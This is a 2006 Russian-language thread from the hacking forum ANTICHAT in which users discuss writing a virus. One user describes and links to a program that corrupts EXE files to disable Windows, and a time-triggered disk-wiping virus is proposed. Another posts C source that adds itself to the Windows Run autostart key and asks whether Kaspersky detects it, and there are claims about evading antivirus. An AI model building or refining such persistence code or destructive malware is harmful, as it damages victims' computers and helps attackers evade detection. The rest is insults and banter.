ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.08.2006, 20:20
|
|
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
Провел на форуме:
1290766
Репутация:
1236
|
|
tclover, чувак над было сразу опкодами написать 
__________________
  
snow white world wide
|
|
|
29.08.2006, 20:59
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
Сообщение от bul.666
Понимаю вирь сделать который РЕАЛЬНО ЗАРАЖАЕТ КОМП... "вливатеся" в открываемыйе файлы, архивы, и т.д. пересылается по почте, диски... Который сидит до определенного момента, например дать ему дату типа 01.01.2007.= С НОВЫМ ГОДОМ ПРИДУРОК!!! или ПОКУПАЙТЕ НАШИ НОСКИ, И вирь валит винт... Или еще чего...
вот нормальное предложение, такс думаю проблема будет с отркытыми фафлами, а так можно и вместо ini Exe и dll спокойно валить, так что виндовс свалиться без проблем. я подумаю =)
|
|
|
|
29.08.2006, 21:05
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
Сообщение от [hidden]
Кстати, программы, которые пишут в HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run какую-нибудь инфу, ни Каспером, ни SAV CE не палятся, проверено лично. Другое дело, что этому "вирусу" это в натуре не нужно.
бугагага вот именно я бы тогда и сделал в реестр, так как каспер, то и палит!!!!!!! это я ещё узнал давным давно, даже когда у меня был старый каспер!
ссыла обновилась! http://slil.ru/23069868
Кстати теперь он портит не ini, а EXE, что естественно выведет из строя винду
Последний раз редактировалось Sn@k3; 29.08.2006 в 22:34..
|
|
|
|
29.08.2006, 23:28
|
|
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364
Репутация:
1847
|
|
Горбатого могила исправит.
|
|
|
|
29.08.2006, 23:58
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
tclover И не говори +)
эй а ты чего тут делаешь? ты htnl выучил? )
|
|
|
|
30.08.2006, 00:00
|
|
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364
Репутация:
1847
|
|
Неа  Возьми меня в ученики падшая сволоч! |
|
|
|
30.08.2006, 00:24
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
ээээ чего-то ты разошелся, ты так низко пал =). а чего ругаешься? мы цывилизованные люди.
|
|
|
|
30.08.2006, 00:48
|
|
Участник форума
Регистрация: 05.11.2005
Сообщений: 103
Провел на форуме:
425441
Репутация:
31
|
|
http://webfile.ru/1080663
Написана на языке С (Visual C), не делает ничего плохого - только заносит в реестр в ключ автозагрузки , откуда ее запустили под именем damned.
Проверь, Sn@k3, неужто Каспер вот прямо сходу несчастную программу выпалит?
----------------
#include<stdio.h>
#include<string.h>
#include<windows.h>
#pragma comment(linker,"/MERGE:.rdata=.text")
#pragma comment(linker,"/FILEALIGN:512 /SECTION:.text,EWRX /IGNORE:4078")
#pragma comment(linker,"/ENTRY:WinMain")
#pragma comment(linker,"/NODEFAULTLIB")
//********************************************
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR szCmdLine, int nCmdShow)
{
int nSize;
char *file_path;
char *buf;
char **argv;
DWORD argc;
long int result;
HKEY hKey;
SetErrorMode(SEM_NOGPFAULTERRORBOX);
//******************************************
argv = CommandLineToArgvW(GetCommandLineW(), &argc);
buf = (char *)malloc(256);
file_path = (char *)malloc(256);
nSize = GetCurrentDirectory(256, buf);
buf[nSize + 1] = '\0';
sprintf(file_path, "%s\\%ws", buf, argv[0]);
result = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, KEY_ALL_ACCESS, &hKey);
// заносим в реестр .../Run под именем damned
RegSetValueEx(hKey, "damned", 0, REG_SZ, file_path, strlen(file_path));
RegCloseKey(hKey);
exit(0);
}
Последний раз редактировалось [hidden]; 30.08.2006 в 00:51..
|
|
|
|
30.08.2006, 01:24
|
|
Участник форума
Регистрация: 24.03.2006
Сообщений: 184
Провел на форуме:
344009
Репутация:
72
|
|
эх блин вирь писатель хренов
ты Че ВИрусоПисателей позориш та
по моему статья херовая
|
|
|
|
30.08.2006, 01:28
|
|
Участник форума
Регистрация: 24.03.2006
Сообщений: 184
Провел на форуме:
344009
Репутация:
72
|
|
Неа Возьми меня в ученики падшая сволоч!
Клевер жоош
но кстати ты прав
СВОЛАЧАМ падшим не чего делать на ачате
Отжог ыыыыы пацотолом
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [hidden]](/avatars/avatar20045.jpg?187781){kind=avatar}
![Аватар для [loy]](/avatars/avatar23093.jpg?187793){kind=avatar}
![Аватар для [loy]](/avatars/avatar23093.jpg?187794){kind=avatar}
Похожие темы
Линейный вид
